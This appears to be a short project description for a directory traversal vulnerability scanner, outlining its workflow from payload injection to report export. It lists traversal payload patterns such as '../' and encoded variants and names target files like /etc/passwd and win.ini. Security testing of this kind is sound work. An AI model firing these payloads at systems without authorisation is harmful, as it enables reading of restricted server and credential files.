Why Choose This Project

Directory Traversal (Path Traversal) is a critical web vulnerability where attackers manipulate file paths to access restricted files on a server, such as /etc/passwd or C:\Windows\System32. This tool detects whether a web application is vulnerable by fuzzing URL parameters and file inputs with traversal payloads. It’s a vital skill for ethical hackers, bug bounty hunters, and web security testers.

What You Get in This Project

A scanner that detects directory traversal vulnerabilities in URLs or file paths by automatically injecting payloads and checking for unintended file access. It shows severity, test vectors, and mitigation steps.

Technology Stack

How It Works

1. User Inputs Target URL
   Users submit a target URL with possible file input (e.g., file=path/to/file.txt).

2. Scanner Loads Payload List
   Common traversal payloads like ../, ..%2F, %2e%2e/, ..\\, and double-encoded versions are loaded.

3. Request Injection
   Each payload is injected into the target parameters to replace the file path.

4. Response Analysis
   The scanner analyzes responses for signs of sensitive files:

   • Linux: /etc/passwd, /var/log/auth.log

   • Windows: boot.ini, windows/win.ini

5. Detection & Logging
   If successful (status 200 and file signature detected), it's flagged as vulnerable.

6. Result Display
   A detailed report shows:

   • URL tested

   • Payload used

   • Vulnerable or not

   • Suggested mitigation

7. Report Export
   Users can download the scan report.

Key Features